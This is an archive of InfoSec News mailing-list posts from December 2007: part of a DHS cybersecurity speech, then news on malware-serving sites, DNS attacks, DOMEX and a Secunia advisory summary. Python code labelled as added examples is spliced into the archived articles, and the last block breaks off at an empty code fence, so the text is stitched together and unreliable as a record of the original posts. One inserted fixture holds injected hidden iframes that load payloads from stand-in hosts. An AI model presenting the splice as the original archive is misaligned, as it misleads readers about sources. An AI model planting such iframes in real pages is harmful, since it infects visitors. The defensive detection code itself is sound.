So we're learning, and we're working to improve our information sharing. That's one of InfraGard's key tenets and the ultimate goal for all our actions. As we move into the discussion portion of this event, I'm very interested to hear your ideas about other ways we can share useful and relevant information between sectors.

In addition to sharing information with its public and private partners, one of US-CERT's most important responsibilities is increasing the Federal Government's awareness of its own network activity. We know from our friends in law enforcement that situational awareness is the primary method a beat cop uses to protect a neighborhood.
As I'm sure Joe can recall from his days on the force, a veteran officer works to deter crime wherever possible and catches criminals by understanding their environment, watching for trends and patterns, and knowing the rhythms of the community. We know the same is true for cyber first responders. So we created an early warning system that watches for malicious patterns in network traffic and notes irregular activity. Just as in neighborhood policing, out-of-the-ordinary events or activities can tip off agency cyber responders to potential trouble.

EINSTEIN, as it is known, is that early warning system. It monitors participating agencies' network gateways for traffic patterns that indicate the presence of computer worms or other unwanted traffic. By collecting this information, EINSTEIN gives our analysts a big-picture view of potentially malicious activity on federal networks.

Prior to EINSTEIN, it took cyber security responders four to five days to gather and share critical data on federal government computer security risks. Today, we can produce that information in as little as four to five hours. By analyzing network traffic for potential cyber threats before they can exploit vulnerabilities, EINSTEIN makes it more difficult, more time consuming, and more expensive for cyber criminals to reach and impact their intended targets. EINSTEIN provides us with unique traffic pattern analysis that US-CERT, as appropriate, can share with its partners.

Now another program that exemplifies knowledge sharing in action is the National Vulnerability Database. Sponsored by my office and the National Institute of Standards and Technology (NIST), the National Vulnerability Database or NVD puts the more than 28,000 known cyber security vulnerabilities into a single publicly available resource. NIST analysts then score them according to the severity of their risk.

Accessed at a rate of 48 million hits a year, the NVD's data enables all organizations to automate their vulnerability management, security measurement, and compliance activities through a series of security checklists and metrics.

Recently, your colleagues in the payment card industry recognized the value of the database to their cyber risk management efforts. Last June, the industry's data security standards required that all credit card processing vendors use the National Vulnerability Database to evaluate the security of their payment systems. Essentially, it says that vendors must ensure that their systems do not include vulnerabilities that score higher than a pre-determined NVD number. This greatly enhances the security of every credit card transaction, prevents disruptions of key operating systems, and protects consumer information.

The value of the NVD is not limited to the credit card processing industry. If you haven't investigated the potential beneficial uses of this program in your companies, I strongly encourage you to do so immediately. You can access it by going to US-CERT's homepage (www.USCERT.gov) and searching for "NVD."

The NVD is a wonderful example of an industry-led adoption of a valuable government tool. And it also underscores our role in the federal government, to provide resources that help all of you do your jobs more effectively.

Let's move to another example of collaboration and information sharing. You know, in many ways, the enemy is already at the gate. So if we are going to secure cyberspace, we must marshal our defenses, learn from each other, and work together as never before.

I'm a true believer in the phrase, "you play how you train." This is why exercises are critical to our national and financial security. InfraGard members already understand this. The Vermont InfraGard is a key planner in the state of Vermont's first ever cyber exercise, which my office is helping to design and implement.
The lessons learned from next month's exercise will aid in the development of a cyber annex to the state of Vermont's emergency operations plan. At the national level, we are actively planning for the March 2008 national cyber exercise, Cyber Storm II, which follows the highly successful cyber storm I held in February 2006. This exercise examines our response and coordination mechanisms against a simulated cyber event affecting international, federal, state, and local governments, and the private sector. By organizing and executing an exercise such as cyber storm, DHS is able to test our planning, information sharing and response to attack scenarios, assess our strengths and weaknesses in those areas, and learn how to improve response capabilities. I am thrilled that the financial services sector, through the financial services ISAC, is once again fully engaged in the planning and execution of the cyber storm exercise. Their participation in the exercise demonstrates their firm commitment to cyber preparedness and I hope sends a signal to other sectors that cyber security measures need to be taken seriously. Throughout the country, at every level of government and within the private sector, people are dedicating themselves to ending cyber crime. To do this at CS&C it's necessary for my office to engage in robust collaboration and information sharing with our law enforcement partners. We do this through a liaison office in the US-CERT, which houses liaison officers from the U.S. Secret Service and FBI. For example, maintaining the necessary division of authorities, US-CERT and the FBI worked closely together to identify and investigate cyber criminals and threats during Operation Bot Roast II. An ongoing and coordinated initiative, Operation Bot Roast finds and captures the criminals that overtake people's computers to conduct criminal activities. 
Since it began last June, the FBI, with US-CERT's technical input, captured eight individuals responsible for infecting over one million compromised computers. We estimate the economic loss to be at more than $20 million to date. As the investigation continues, I have no doubt those numbers will increase. At DHS, we know that online payment systems are profitable money makers for criminals. A recent 24-month Secret Service investigation of e-gold, an online payment system favored by criminals, resulted in the seizure of over $16 million. In Miami, a Secret Service's cyber crime fraud investigation recovered more than 200,000 stolen credit card account numbers at a potential loss exceeding $75 million. And here in New York, a Secret Service investigation with the Manhattan District Attorney's office led to the indictment of 17 people and a company called Western Express, a digital currency transmittal service. The defendants are facing charges related to global trafficking in stolen credit card numbers, cyber crime, and identity theft. Based on the over 1.3 terabytes of digital evidence it obtained from search warrants and subpoenas, the Secret Service estimates that approximately $15 million flowed through Western Express' digital currency accounts. Additional judicial action is ongoing with respect to targets identified overseas. We're starting to really hurt the criminals. Eventually, they are going to realize that it is just too expensive -- both financially and in potential jail time -- to "conduct business" in the United States. In addition to catching the criminals, my office also works closely with the Departments of Justice and Defense to prepare for and, if necessary, respond to a national-level cyber incident.
As co-chairs of the National Cyber Response Coordination Group (NCRCG), we work with 19 different federal agencies, including the FBI and the Secret Service, to ensure that the full range and weight of the Federal Government's cyber capabilities are deployed in a coordinated and effective fashion. For example, the NCRCG recently convened to address and respond to the denial of service attack against the government of Estonia, a NATO ally. Additionally, the NCRCG will be an active participant in Cyber Storm II. Effective cyber and communications risk management requires us to be prepared for a national crisis beyond those caused by terrorists or criminals. Now, I've talked a lot about cyber viruses. But we still have to contend with the more traditional biological virus -- that is, the potential effects of a public health crisis, such as an outbreak of pandemic flu. The spread of pandemic disease across the U.S. will be rapid and unpredictable. We estimate that as much as 40 percent of the workforce will be unable to report to work during peak periods of an outbreak -- and you don't get to pick which 40 percent that could be. Naturally, telecommuting will be a key mechanism to keeping our businesses and government operational during a pandemic flu. Preparing for the increase in telecommuting is a demonstration of public-private collaboration in action. A working group led by one of my components, the National Communications System, and including experts from the Federal Reserve Board, the Department of the Treasury, the Financial and Banking Information Infrastructure Committee, and the Financial Services Sector Coordinating Council, meets monthly to plan for the potential communications consequences of a pandemic influenza. What the working group found is that, while the telecommunications backbone is unlikely to experience congestion, the so-called last mile -- to the home and the enterprise -- could experience disruptive congestion.
But it concluded that this disruption could be mitigated if certain safeguards and practices are implemented by enterprises and telecommuters. In collaboration with major internet service providers (ISPs), telecommunications carriers, and equipment and service vendors, the working group developed the following best practices that we strongly encourage businesses and government agencies to consider:
1. Limit remote access to users critical to maintaining business continuity;
2. Limit access to business critical services through the enterprise connection;
3. Adjust or retime automatic desktop backup software and software updates for telecommuters;
4. Obtain a telecommunications service priority (TSP) for enterprise;
5. Subscribe to government emergency telecommunications service (GETS) cards and/or wireless priority service (WPS) capabilities for critical IT staff; and
6. Enhance your cyber security posture due to increased reliance on communications and IT, reduced support staff, and increased threat of cyber attack.
Implementing these practices will help reduce significant impacts on our nation's economy. All of us must do everything possible to keep our nation operating and delivering critical services under even the most challenging circumstances. I consider everyone in this room today a key partner in the effort to strengthen our nation's cyber infrastructure. You understand that the Internet, and the many enterprise networks that depend on it, is one of the central platforms for business operations, supply chain management, and business continuity. However, I'm more concerned about the people who aren't in this room because, as a recent business roundtable report suggests, they don't understand that this is a matter of their own business survival. Cyberspace is a profitable marketplace and enabler of market activity.
But if businesses, whether in the financial services sector or otherwise, haven't made the investment in the people, processes, and technologies that will keep them operational in a crisis, our economy, in fact our very way of life, is at stake. We can't let this happen. So here's what we all need to do. First, memorize US-CERT's website address -- www.USCERT.gov -- and give it to everyone who needs it. Tell your partner organizations and businesses to sign up for the cyber security alerts and to report any potential cyber incident, threat, or attack they find. We can only act upon the information we know about. The information our partners provide increases our understanding and awareness of the health of the overall cyber infrastructure and improves our response and protective measures. Second, encourage your partners to participate in public-private partnerships like InfraGard and the financial services ISAC. These collaborations act as force multipliers for increasing awareness of cyber security challenges as well as implementing actionable and enduring solutions. Additionally, they serve as an easily accessible mechanism to educate people on how cyber vulnerabilities can have real world consequences to our physical infrastructures. Finally, encourage your colleagues to make security a part of their everyday business operations. It doesn't take long for cyber events to have real world consequences. Have them look at every step of their business lifecycle -- from system configuration to in-house software development -- to see if common security practices are being followed and that response plans are prepared accordingly. Help them realize that when they build a culture of security within their organizations they make great strides in ensuring the resilience of their business operations.
Laws such as Sarbanes-Oxley, the Gramm-Leach-Bliley Act, and the Health Insurance Portability and Accountability Act (HIPAA) place a fiduciary responsibility on them to ensure the security of their customers' information and their systems. However, in reality, these recommendations are simply the right thing to do for their companies, their customers, their fellow citizens, and the nation as a whole. So let's work together to make it happen. Before I close, I would like to make one last comment. Thank you for your commitment to cyber security and your active participation in InfraGard. I have had a chance to work with members across the country and know what an important role you all play in our cyber security awareness efforts. I urge you to use the time at this meeting to learn as much as you can, and then share your knowledge with your colleagues, professional networks, friends and families. Cyber security is a complex problem, yes, but the dangers are easily understood, and the solution is simple: you can't guard all of cyberspace, but you can protect your piece of it. From alerts at infosecnews.org Thu Dec 13 02:05:06 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] eEye founder calls it quits Message-ID: http://www.infoworld.com/article/07/12/12/eEye-founder-calls-it-quits_1.html By Robert McMillan IDG News Service December 12, 2007 eEye Digital Security founder Marc Maiffret has left the company and plans to launch a new venture, developing next-generation mobile phone software for the corporate world. A noted hacker, Maiffret co-founded eEye in the late 1990s with Firas Bushnaq and had served as the company's CTO, overseeing a staff of about 30 engineers. Bushnaq stepped down as CEO in 2006, and Maiffret said that he'd started thinking about leaving to pursue other startup ideas earlier this year. "I'd been doing it a long time," he said Wednesday. 
"I started the company when I was 17 and had been doing it the last 10 years." The 70-person company, based in Aliso Viejo, California, has been going through some bumpy times lately. Bushnaq's replacement, Ross Brown, was fired earlier this year, and eEye also recently shut down its Orange County sales offices. Maiffret said that this had nothing to do with his departure and that he's leaving eEye in good shape, however. "Today, it's pretty much an engine that's been running itself," he said. He stopped working for eEye in September but didn't announce his departure until this week. eEye representatives could not be reached immediately for comment, but Maiffret said that the company has not yet found a replacement CTO. He will be doing some consulting work and developing the new software for Windows- and Blackberry-powered mobile phones, which he expects to unveil in the first quarter of next year. "Everybody has these miniature computers in their pockets, but nobody is doing anything interesting with them," he said. Although the new product will not be security-related, Maiffret said he expects to remain involved in the security research community, where he also plans to do consulting work as a self-described "CTO for hire." "I'll probably be more involved in [security research] now," he said, "because being CTO of eEye didn't leave me with a lot of personal time to do hands-on research." 
From alerts at infosecnews.org Thu Dec 13 02:05:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] DNS attack could signal Phishing 2.0 Message-ID: Forwarded from: Crypto Admin On 12/11/07, InfoSec News wrote:
> http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html
>
> By Robert McMillan
> IDG News Service
> December 11, 2007
>
> Researchers at Google and the Georgia Institute of Technology are
> studying a virtually undetectable form of attack that quietly controls
> where victims go on the Internet.
Please read the comments on this article over at CircleID, where it is pointed out that the data does not support any difficulties with open recursive DNS servers, but rather with misconfigured DNS servers. Both David A. Ulevitch and Brett Watson make the points far better than I could. http://www.circleid.com/posts/malicious_open_recursive_dns_servers/ The authors of this report would have done themselves a favor, had they listened to their reviewers. From alerts at infosecnews.org Thu Dec 13 02:05:36 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Document & Media Exploitation: The DOMEX challenge is to turn digital bits into actionable intelligence. Message-ID: http://www.acmqueue.com/modules.php?name=Content&pa=showpage&pid=512 By Simson L. Garfinkel, Ph.D. ACM Queue vol. 5, no. 7 November/December 2007 A computer used by Al Qaeda ends up in the hands of a Wall Street Journal reporter. A laptop from Iran is discovered that contains details of that country's nuclear weapons program. Photographs and videos are downloaded from terrorist Web sites. As evidenced by these and countless other cases, digital documents and storage devices hold the key to many ongoing military and criminal investigations.
The most straightforward approach to using these media and documents is to explore them with ordinary tools - open the word files with Microsoft Word, view the Web pages with Internet Explorer, and so on. Although this straightforward approach is easy to understand, it can miss a lot. Deleted and invisible files can be made visible using basic forensic tools. Programs called carvers can locate information that isn't even a complete file and turn it into a form that can be readily processed. Detailed examination of e-mail headers and log files can reveal where a computer was used and other computers with which it came into contact. Linguistic tools can discover multiple documents that refer to the same individuals, even though names in the different documents have different spellings and are in different human languages. Data-mining techniques such as cross-drive analysis can reconstruct social networks - automatically determining, for example, if the computer's previous user was in contact with known terrorists. This sort of advanced analysis is the stuff of DOMEX, the little-known intelligence practice of document and media exploitation. The U.S. intelligence community defines DOMEX as "the processing, translation, analysis, and dissemination of collected hard-copy documents and electronic media, which are under the U.S. government's physical control and are not publicly available." [1] That definition goes on to exclude "the handling of documents and media during the collection, initial review, and inventory process." DOMEX is not about being a digital librarian; it's about being a digital detective. Although very little has been disclosed about the government's DOMEX activities, in recent years academic researchers - particularly those concerned with electronic privacy - have learned a great deal about the general process of electronic document and media exploitation.
My interest in DOMEX started while studying data left on hard drives and memory sticks after files had been deleted or the media had been "formatted." I built a system to automatically copy the data off the hard drives, store it on a server, and search for confidential information. In the process I built a rudimentary DOMEX system. Other recent academic research in the fields of computer forensics, data recovery, machine translation, and data mining is also directly applicable to DOMEX. This article introduces electronic document and media exploitation from that academic perspective. It presents a model for performing this kind of exploitation and discusses some of the relevant academic research. Properly done, DOMEX goes far beyond recovering documents from hard drives and storing them in searchable archives. Understanding this engineering problem gives insight that will be useful for designing any system that works with large amounts of unstructured, heterogeneous data.
Why "Exploitation?"
When researchers say that their work is centered on information or document "exploitation," eyebrows invariably raise. The word exploitation is provocative, attracting unwarranted attention to a process that could just as easily be classified as "computer forensics" or even "data recovery." But, in fact, the word is apropos. The words exploit and exploitation imply using something in a manner that's "unfair or selfish." [2] And it's true. People who are in the business of document and media exploitation really do seek to make unfair use of computer documents and electronic storage devices. Fair, after all, means following the rules. The "rules" of a computer system are the APIs, the data-storage standards, the file permissions, and other interfaces that were intended to be used by the file's creator. When a file in the computer's electronic trash is deleted by "emptying the trash," the rules say that the file's contents should no longer be accessible.
The "undelete" command that is part of every forensic toolkit takes advantage of the fact that computer systems generally do not overwrite the contents of deleted files. This is a common problem in computer systems, affecting not only deleted files in file systems but also deleted paragraphs in word processors and even unallocated pages in virtual memory systems. Computer forensic practitioners working for police departments and litigation support firms also make their living by recovering intentionally deleted data, but even these processes follow rules - though those involved in exploitation might choose to ignore them. The goal of computer forensics is to assist in some kind of investigation, which usually begins because a crime was committed and, hopefully, ends with the perpetrator being convicted in a court of law. With conviction as a goal, forensic practitioners must be concerned with the evidentiary integrity and chain of custody - and they need to limit their search to information that is relevant to that investigation. In many cases the evidence will have been obtained under a search warrant or discovery procedure, the terms of which may limit the forensic examiner's actions or even which kinds of files may be examined. Evidence obtained by breaking the rules may even be suppressed. For example, in the case of U.S. v. Carey, an investigator executing a warrant on narcotics discovered files with a JPG extension that contained child pornography. Carey was indicted and convicted for possession of child pornography, but the appellate court reversed the ruling and remanded the case back to the trial court, arguing that "the seizure of evidence was beyond the scope of the warrant." [3] The evidence should have been suppressed. Unlike the investigators in the Carey case, those engaged in document and media exploitation are not bound by any rules other than laws of physics and nature.
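The carvers mentioned above, and the "undelete" observation that deleted data is usually left in place rather than overwritten, are easy to see in a few lines. The following is an added illustration, not code from Garfinkel's article or any forensic toolkit: a minimal header/footer carver run over a constructed byte buffer standing in for unallocated disk space, with the signature table and the sample image both being assumptions made for this example.

```python
from __future__ import annotations

from dataclasses import dataclass

# Header/footer signatures for two carve targets. Chosen for this example;
# a real carver ships a much larger signature table.
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82"),
}


@dataclass
class CarvedFile:
    kind: str        # signature name that matched
    offset: int      # byte offset of the header in the image
    data: bytes      # carved bytes (header through footer, or a bounded window)
    complete: bool   # False when no footer was found within max_size


def carve(image: bytes, max_size: int = 1 << 20) -> list[CarvedFile]:
    """Scan raw bytes for known headers and cut out candidate files.

    The scan deliberately ignores file-system metadata: that is what lets a
    carver recover material whose directory entry was deleted or whose
    allocation record never existed. A header with no matching footer within
    max_size bytes is still reported, flagged incomplete, because a partial
    recovery is often worth having (the "first 200 pages" attitude).
    """
    found: list[CarvedFile] = []
    for kind, (header, footer) in SIGNATURES.items():
        pos = 0
        while True:
            start = image.find(header, pos)
            if start < 0:
                break
            limit = min(len(image), start + max_size)
            end = image.find(footer, start + len(header), limit)
            if end < 0:
                found.append(CarvedFile(kind, start, image[start:limit], False))
                pos = start + len(header)   # keep scanning past this header
            else:
                end += len(footer)
                found.append(CarvedFile(kind, start, image[start:end], True))
                pos = end
    found.sort(key=lambda c: c.offset)
    return found


def build_sample_image() -> bytes:
    """Constructed stand-in for unallocated disk space (not a real image)."""
    jpeg = b"\xff\xd8\xff\xe0" + b"JFIF-constructed-payload" + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR-constructed" + b"IEND\xae\x42\x60\x82"
    truncated = b"\xff\xd8\xff\xe1" + b"partial"   # header survives, tail gone
    return (
        b"\x00" * 37 + jpeg          # deleted file at an unaligned offset
        + b"\x00" * 100 + png        # second deleted file
        + b"\xaa" * 64 + truncated   # partially overwritten file
        + b"\x00" * 50
    )


if __name__ == "__main__":
    for c in carve(build_sample_image()):
        state = "complete" if c.complete else "INCOMPLETE"
        print(f"{c.kind:5} @ {c.offset:6d}  {len(c.data):5d} bytes  {state}")
```

The incomplete hit shows the caveat the article raises: what comes back is useful, but nothing about the process proves the bytes belong to one file.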
The goal of information exploitation is to get and use the data - the ends justify the means. It's OK if these results aren't good enough for a conviction. Exploitation rarely seeks to prove or disprove the details of a case; instead, it seeks to make the fullest use of all the data that has been obtained. The standard of success is the usefulness of the result, not the reliability of the process. If you find the preceding paragraph alarming, remember that DOMEX is about exploiting data, not people. "Exploitation" is precisely the attitude that you want when you take a crashed hard drive to a data-recovery firm. If you've just lost the only copy of a 400-page manuscript, it's probably OK with you if the firm is able to recover the first 200 pages of the September 20 version and the last 180 pages of the August 19 version. Although a good defense attorney might be able to suppress a document that was made by stitching together those two halves, you probably don't care about that if you are the author and the alternative is rewriting the 400 pages from memory. Likewise, if you are using some kind of desktop search system to index the files on your hard drive, you don't mind if the product makes a mistake or two and shows you files that you aren't "allowed" to see - just as long as you find what you're searching for. [...] From alerts at infosecnews.org Thu Dec 13 02:05:48 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Fewer connections could limit cyber attacks, agency official says Message-ID: http://www.govexec.com/story_page.cfm?articleid=38817 By Aliya Sternstein Technology Daily December 12, 2007 A Justice Department cyber-security official on Wednesday touted the government's strategy of reducing its number of Internet connections to 50 by June in order to reduce cyber vulnerabilities. 
The government's "Trusted Internet Connections" initiative, which was announced last month, will help protect information by shrinking the attack surface area -- or the number of access gateways that must be monitored, Mischel Kwon, the department's chief information technology security specialist, told a group of federal government IT professionals. "This is an absolutely great, great program," Kwon said. She said the effort cuts to the core of today's cyber-security problem: The basic threats are the same as they were in 2001, but the maneuvers are easier and more widespread. Kwon told the Association for Federal Information Resources Management that the threats are still hackers, "hacktivists," industrial spies, organized crime groups, terrorists and national governments. But now, the fraudsters can easily create Internet viruses by reading how-to lessons on the Internet itself, said Kwon, who runs Justice's cyber-defense operation. The most popular attack right now, she said, is "in by e-mail, out by Web." The culprits send a message embedded with a link, and then dupe the victim into clicking on the link to go to a separate Web page where they enter sensitive information or download malevolent software. Once the exercise is complete, the intruder can enter the victims' networks, and "we're all in business," Kwon said. She warned the audience not to assume that all such "phishing" e-mail messages have a misspelling "because it will fool everyone." From alerts at infosecnews.org Thu Dec 13 02:05:59 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Man suspected of videotaping women in a restroom Message-ID: http://www.dailybreeze.com/ci_7702097 By Larry Altman Staff Writer 12/12/2007 A worker at a Gardena aerospace parts manufacturer attached a tiny camera in a restroom and transmitted video of at least one woman to his desk as she used a toilet, police said today. 
Ryan Castillo, 29, was arrested Tuesday at his home in the unincorporated area between Harbor Gateway and Carson, Gardena police Lt. Ed Burnett said. At first, officials at Space-Lok Inc. at 13306 Halldale Ave. suspected that Castillo had hacked into files in the firm's computer network and e-mail system. But when they began examining his computer Monday, they found something else on his desk - an iPod-sized receiver with a small video screen, Burnett said. On it, they discovered, several video clips of a female employee using the company restroom, police said. "It was being wireless transferred to this receiver," Burnett said today. "It's still early on. We don't know how many people are in the video clips." So far, police know of one particular woman who appeared to be targeted. Castillo, police said, attached sugar-cube sized cameras on drain pipes under the sinks in two restrooms, covering them with insulation. The cameras' pinhole-sized lenses pointed at the toilets, which were across from the sinks. The bathrooms, used by both men and women, had one toilet and a sink, with no stall. Burnett said investigators do not know if Castillo was watching live. A couple of wires on the cameras transmitted to the receiver at his desk. Police confiscated his computer and are examining it for evidence. Officers booked Castillo at the Gardena jail on suspicion of unauthorized access to a computer network, which is a felony. He also was held on suspicion of observing a person in a restroom, a misdemeanor. He was released after posting $30,000 bail. Officials at Space-Lok are looking into what files Castillo allegedly hacked. They will provide that information to police, Burnett said. It was unclear what Castillo did at the company. A company official hung up when a reporter contacted him today at the business. 
From alerts at infosecnews.org Thu Dec 13 02:06:11 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Man makes toaster hack computer Message-ID: http://www.expressindia.com/latest-news/Man-makes-toaster-hack-computer/249695/ By Chandan Haygunde December 13, 2007 Pune - Can you imagine a toaster hacking a computer? That's true. In fact any kitchen appliance can be used for attacking your computer system, said Dror Shalev, a hacker from Israel, during the international convention of hackers "Clubhack 2007" held recently. In his demonstration at the convention, Shalev left the audience amazed by actually hacking a computer with a toaster. Shalev, who is a security expert at Check Point Software Technologies in Israel, was one of the foreign speakers at the international convention. He said that any home device could be connected with a software prototype to hack a computer. "I read a senior scientist from Google saying there was no need to be afraid of a toaster at home," Shalev told The Indian Express. "But as a hacker I came up with a toaster that could actually hack a computer. I call it a 'Crazy Toaster'." Simplifying the functions of "Crazy Toaster," Shalev said he developed a software and networked it with the toaster. "As soon as the toaster is plugged, the software is activated before it breaks into the user's computer system. The same software prototype can be networked with any home appliance for stealing the web secrets," he said. "With wireless technology available, there is no need for connecting the appliance with the computer." Shalev said he just wanted to convey that one couldn't blindly trust "anything" in the world of internet. "As the usage of computers and internet goes up, we will need to be cautious about every object in our surroundings," he said, suggesting people purchase home appliances of branded companies.
"If an appliance or home device comes as a gift, accept it only if it is from someone you trust." Shalev also said people should believe in ethical hackers like him, who were doing constructive work for security firms, and doing work just for the love of programming and not for money. "Hackers play a crucial role in developing a good product and save millions of dollars by ensuring that precious databases and information are not compromised." Appreciating the initiative taken by the Indian hackers to organise Clubhack, he said such conventions should be arranged on regular basis. "The world is turning into a global village. But this village is not secure in terms of the cyber crimes," he said. "It is necessary for ethical hackers across the globe to converge and share knowledge." From alerts at infosecnews.org Fri Dec 14 00:21:02 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] French Embassy Web site for Libya said to be serving up malware Message-ID: http://www.networkworld.com/news/2007/121307-libya-site-malware.html By Ellen Messmer Network World 12/13/07 The French Embassy Web site for Libya has been compromised and is serving up malware to visitors, according to McAfee. McAfee researcher Francois Paget discovered the compromise Thursday, and the company says it has reported its findings to the French government. The site has been attacked using an iFrame exploit that inserts an invisible frame in the page in order to re-direct some Web browser connections to another location, which serves up a "downloader," code that attempts to reside on the victim machine. If the downloader is successful, the attacker can then remotely attempt to download other malware, "typically a bot or a password-stealing Trojan," says Dave Marcus, McAfee security researcher and communications manager.
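The invisible-frame injection described above is something a site owner can check for from the served HTML alone. The following is an added example, not McAfee's tooling or anything from the article: a small auditor that flags iframes which are hidden (zero size or display:none) or which load content from a host other than the site's own. The sample page and every hostname in it are constructed placeholders for this example.

```python
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_hidden(attrs: dict) -> bool:
    """Heuristics for an iframe the visitor cannot see (assumed set, not exhaustive)."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        raw = (attrs.get(dim) or "").strip().lower().rstrip("px")
        if raw.isdigit() and int(raw) <= 1:
            return True
        if f"{dim}:0" in style:          # e.g. style="width:0;height:0"
            return True
    return False


class IframeAuditor(HTMLParser):
    """Collect iframes that are hidden or that pull content from another host."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings: list[tuple[str, list[str]]] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        # urlparse handles absolute and protocol-relative ("//host/x") sources
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if _is_hidden(a):
            reasons.append("hidden")
        if host and host != self.site_host:
            reasons.append("external")
        if reasons:
            self.findings.append((src, reasons))


def audit_page(html: str, site_host: str) -> list[tuple[str, list[str]]]:
    """Return (src, reasons) for each suspicious iframe, in document order."""
    parser = IframeAuditor(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed page: one legitimate embed plus two injected frames of the kind
# the article describes. Hostnames are placeholders, not real indicators.
SAMPLE_PAGE = """
<html><body>
<h1>Embassy news</h1>
<iframe src="https://www.embassy.example/events" width="600" height="400"></iframe>
<p>Visiting hours and consular services.</p>
<iframe src="http://redirector.example/in.cgi" width="0" height="0" style="border:0"></iframe>
<iframe style="display:none" src="//dropper.example/load.php"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in audit_page(SAMPLE_PAGE, "www.embassy.example"):
        print(f"{src}: {', '.join(reasons)}")
```

A frame flagged as both hidden and external is the pattern to treat as an incident; a visible same-origin frame is reported only if one of the heuristics misfires, which is why the reasons are returned rather than a bare boolean.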
Marcus says Paget, a researcher with tools to scan scripts and investigate code behavior, happened by chance to be looking at the French Embassy Web site for Libya and discovered the attack code on it. The incident is similar to discoveries made by security researchers of other compromised Web sites spewing attack code, including that of the Bank of India and the MySpace page of Alicia Keys. McAfee says the attack on the French Web site is being carried out via routing through a Hong Kong provider and then to sites in Russia and the Ukraine. All contents copyright 1995-2007 Network World, Inc.
From alerts at infosecnews.org Fri Dec 14 00:21:26 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Secunia Weekly Summary - Issue: 2007-50 Message-ID:
========================================================================
The Secunia Weekly Advisory Summary
2007-12-06 - 2007-12-13
This week: 100 advisories
========================================================================
Table of Contents:
1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing
========================================================================
1) Word From Secunia:
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively.
Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=summary_sm
========================================================================
2) This Week in Brief:
Secunia Research has discovered a vulnerability in Samba, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused by a boundary error within the "send_mailslot()" function. This can be exploited to cause a stack-based buffer overflow with zero bytes via a specially crafted "SAMLOGON" domain logon packet containing a username string placed at an odd offset followed by an overly long GETDC string. Successful exploitation allows execution of arbitrary code, but requires that the "domain logons" option is enabled. The vulnerability is confirmed in version 3.0.27a and is fixed in version 3.0.28. The vendor has also released a patch for 3.0.27a. For more information: http://secunia.com/advisories/27760/
--
Some vulnerabilities have been discovered in the MPEG-4 format from 3ivx, which can be exploited by malicious people to compromise a user's system. The vulnerabilities are caused by boundary errors in 3ivxDSMediaSplitter.ax when processing certain atoms ("art", "nam", "cmt", "des", and "cpy") in MP4 files. These can be exploited to cause stack-based buffer overflows via a specially crafted MP4 file. Successful exploitation allows execution of arbitrary code. The vulnerabilities are confirmed in version 5.0.1 of the file, with the following applications as attack vectors:
* Windows Media Player version 6.4.09.1130 (mplayer2.exe)
* Media Player Classic version 6.4.9.0
Other versions and applications may also be affected. The vulnerabilities are currently unpatched. For more information: http://secunia.com/advisories/27998/
--
Microsoft released its last batch of Security Bulletins for the year.
Seven Security Bulletins were released, with one Extremely Critical advisory, two Highly Critical advisories, two Moderately Critical advisories, and two Less Critical advisories.

The Extremely Critical advisory discusses a cumulative update for Internet Explorer. One of the vulnerabilities discussed in the advisory is reportedly currently being exploited to execute arbitrary code.

For more information:
http://secunia.com/advisories/28036/

Several highly critical vulnerabilities in the Windows Media Format Runtime / Windows Media Services were also disclosed, which could be exploited to execute arbitrary code.

For more information:
http://secunia.com/advisories/28034/

Two highly critical vulnerabilities in Microsoft DirectX were also reported, which could be exploited to execute arbitrary code.

For more information:
http://secunia.com/advisories/28010/

Two moderately critical vulnerabilities, one in the Message Queuing Service (MSMQ) in Windows and another in Vista SMBv2 signing, can be exploited to execute arbitrary code, but require that the MSMQ component is installed (not the default setting) and that SMBv2 is enabled (not the default setting), respectively.

For more information:
http://secunia.com/advisories/28051/
http://secunia.com/advisories/27997/

Two less critical vulnerabilities, one in Windows Advanced Local Procedure Call (ALPC) in Vista and another in the Message Queuing Service (MSMQ), can be exploited by malicious, local users to gain escalated privileges.

For more information:
http://secunia.com/advisories/28015/
http://secunia.com/advisories/28011/

Users are urged to run Windows Update as soon as possible.
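The Samba advisory in the brief above gives the two conditions that matter for exposure: a Samba release older than 3.0.28 and "domain logons" enabled. The following is an added example (not Samba's or Secunia's code) of an exposure check that applies exactly those two conditions to the output of `smbd -V` and the contents of smb.conf. The version-string format, the smb.conf parsing rules and the two sample configurations are assumptions constructed for this illustration.

```python
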